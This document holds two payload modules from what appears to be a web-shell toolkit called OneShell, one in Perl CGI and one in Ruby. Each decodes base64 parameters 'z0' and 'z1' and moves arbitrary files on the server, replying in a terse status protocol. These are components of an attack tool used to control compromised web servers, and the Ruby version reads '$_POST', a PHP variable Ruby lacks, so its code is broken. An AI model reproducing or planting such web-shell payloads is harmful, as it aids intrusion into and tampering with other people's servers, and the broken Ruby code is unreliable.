File: Payload/Perl/CGI/OneShell/file_move.pl
use strict;
use warnings;
use CGI;
use MIME::Base64;
use File::Copy qw(move);

sub main {
    my $q = CGI->new;
    my $z0 = $q->param('z0') // '';
    my $z1 = $q->param('z1') // '';

    my $src_path = decode_base64($z0);
    my $dst_path = decode_base64($z1);

    if (-e $dst_path) {
        print "0|Destination already exists.";
        return;
    }

    if (move($src_path, $dst_path)) {
        print "1|";
    } else {
        print "0|Error.";
    }
}

main();

File: Payload/Ruby/CGI/OneShell/file_move.rb
require 'base64'
require 'fileutils'

def main
  src_path = Base64.decode64($_POST['z0'].to_s)
  dst_path = Base64.decode64($_POST['z1'].to_s)

  if File.exist?(dst_path)
    print "0|Destination already exists."
    return
  end

  begin
    FileUtils.mv(src_path, dst_path)
    print "1|"
  rescue => e
    print "0|Error."
  end
end

main